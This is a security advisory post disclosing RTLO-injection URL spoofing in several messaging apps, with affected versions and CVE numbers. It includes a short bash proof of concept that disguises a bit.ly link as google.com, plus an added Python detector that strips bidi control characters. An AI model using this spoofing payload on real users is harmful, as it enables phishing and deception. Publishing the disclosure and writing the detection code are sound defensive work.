Sick Codes - Security Research, Hardware & Software Hacking, Consulting, Linux, IoT, Cloud, Embedded, Arch, Tweaks & Tips!

Exploit: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096

by Sick Codes
March 24, 2022
in Security
# Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096
# Date: 24/03/2022
# Exploit Authors: zadewg & Sick Codes
# Vendor Homepage: https://www.meta.com
# Vendor Homepage: https://www.instagram.com
# Vendor Homepage: https://www.apple.com
# Vendor Homepage: https://www.signal.org
# Tested on: WhatsApp iOS
# Version: 2.19.80 and below
# Tested on: WhatsApp Android
# Version: 2.19.222 and below
# Tested on: Instagram iOS
# Version: 106.0 and below
# Tested on: Instagram iOS Android
# Version: 107.0.0.11 and below
# Tested on: iMessage (Messages app)
# Version: iOS 14.3 and below
# Tested on: Facebook Messenger app iOS
# Version: 227.0 and below
# Tested on: Facebook Messenger app Android 
# Version: 228.1.0.10.116 and below
# Tested on: Signal
# Version: 5.33.0.25 and below
# CVE: CVE-2020-20093
# CVE: CVE-2020-20094
# CVE: CVE-2020-20095
# CVE: CVE-2020-20096


#!/bin/bash
# Author:       sickcodes
# Contact:      https://twitter.com/sickcodes https://github.com/sickcodes
# Copyright:    sickcodes (C) 2022
# License:      GPLv3+

# References:   https://github.com/zadewg/RIUS
#               https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh
#               https://sick.codes/sick-2022-40


APPEAR_AS='https://google.com'


DESTINATION='bit.ly/3ixIRwm'


printf "\n\n${APPEAR_AS}/\u202E${DESTINATION}\n\n"


# copy paste into any of the above apps.
# victim will see a surreptitious link


# works on latest Signal (unpatched)
CVE-2022-28345 Spoofed URL Bypass

CVE-2022-28345 - Signal client for iOS version 5.33.2 and below are vulnerable to RTLO Injection URI Spoofing using malicious URLs such as gepj.net/selif#/moc.elpmaxe which would appear as example.com/#files/ten.jpeg
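
A receiving-side check for the RTLO injection shown above, as an added example that is not part of the original advisory or the authors' code: it flags URL-like tokens that carry Unicode bidirectional control characters and strips those characters before the text is rendered or linkified. The URL heuristic, the function names and the sample message are assumptions constructed for illustration.

```python
import re
import unicodedata

# Unicode bidirectional formatting characters: embeddings, overrides, isolates, marks.
BIDI_CONTROLS = {
    "\u202A", "\u202B", "\u202C", "\u202D", "\u202E",  # LRE RLE PDF LRO RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI RLI FSI PDI
    "\u200E", "\u200F", "\u061C",                      # LRM RLM ALM
}
# Whitespace-delimited tokens a messenger's linkifier might treat as a URL.
# Simplified heuristic (assumption): a scheme prefix or a dotted host-like token.
URL_TOKEN = re.compile(r"\S*(?:[a-z][a-z0-9+.-]*://|\w\.\w)\S*", re.IGNORECASE)


def find_bidi_controls(text):
    """Return (offset, 'U+XXXX', Unicode name) for every bidi control in text."""
    return [(i, f"U+{ord(ch):04X}", unicodedata.name(ch))
            for i, ch in enumerate(text) if ch in BIDI_CONTROLS]


def suspicious_links(message):
    """Return URL-like tokens that contain a bidi control character."""
    return [m.group(0) for m in URL_TOKEN.finditer(message)
            if any(ch in BIDI_CONTROLS for ch in m.group(0))]


def strip_bidi_controls(text):
    """Remove bidi controls so the displayed order matches the logical order."""
    return "".join(ch for ch in text if ch not in BIDI_CONTROLS)


# Constructed sample with the same shape as the script's output:
# APPEAR_AS + "/" + U+202E + DESTINATION, using reserved example domains.
SAMPLE = "check this https://example.com/\u202Etest.invalid/path now"

if __name__ == "__main__":
    for offset, codepoint, name in find_bidi_controls(SAMPLE):
        print(f"bidi control {codepoint} ({name}) at offset {offset}")
    for link in suspicious_links(SAMPLE):
        print("flagged link:", ascii(link))
    print("sanitized:", strip_bidi_controls(SAMPLE))
```
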
